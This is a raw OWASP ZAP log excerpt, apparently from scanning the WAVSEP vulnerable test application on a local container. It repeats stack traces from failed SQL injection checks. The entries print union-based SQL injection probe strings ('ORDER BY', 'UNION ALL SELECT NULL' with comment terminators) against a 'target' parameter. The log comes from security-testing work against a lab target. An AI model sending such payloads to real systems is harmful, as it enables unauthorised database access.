http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini ORDER BY 3076# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9682376 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682376 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682377 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682377 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682378 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682379 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682380 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682380 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682381 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ ORDER BY 1#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/ ORDER BY 1# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9682382 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682383 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ ORDER BY 7513#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/ ORDER BY 7513# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9682383 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at 